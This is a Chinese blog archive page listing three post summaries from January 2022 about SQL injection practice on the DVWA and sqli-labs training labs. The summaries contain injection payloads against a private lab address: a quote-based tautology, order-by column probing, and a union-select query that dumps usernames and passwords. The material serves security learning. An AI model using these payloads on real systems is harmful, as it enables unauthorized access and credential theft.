01 2022 档案

摘要:Low 一、判断注入类型 1、输入1,查询成功 2、输入1’ or 1='1查询成功 二、查询数据库中字段数 1、输入 2、输入1’ or 1=1 order by 3# 1’ or 1=1 order by 1# 查询失败 1’ or 1=1 order by 2#均查询成功 判断数据库语句中只有 阅读全文
posted @ 2022-01-20 15:45 vayenv 阅读(139) 评论(0) 推荐(0) 编辑
摘要:sqllib-2 数字型注入 192.168.92.129/sqli-labs/Less-2/?id=600 union select 1,20,(select group_concat(username,’:’,password) from users )–+ 阅读全文
posted @ 2022-01-20 15:35 vayenv 阅读(9) 评论(0) 推荐(0) 编辑
摘要:sqllib-1 字符型注入 1、获取数据库名 192.168.92.***/sqli-labs/Less-1/?id=600 ’ union select 1,20,database()–+ 2、获取表 192.168.92.*/sqli-labs/Less-1/?id=*600 *’ union 阅读全文
posted @ 2022-01-20 15:30 vayenv 阅读(27) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示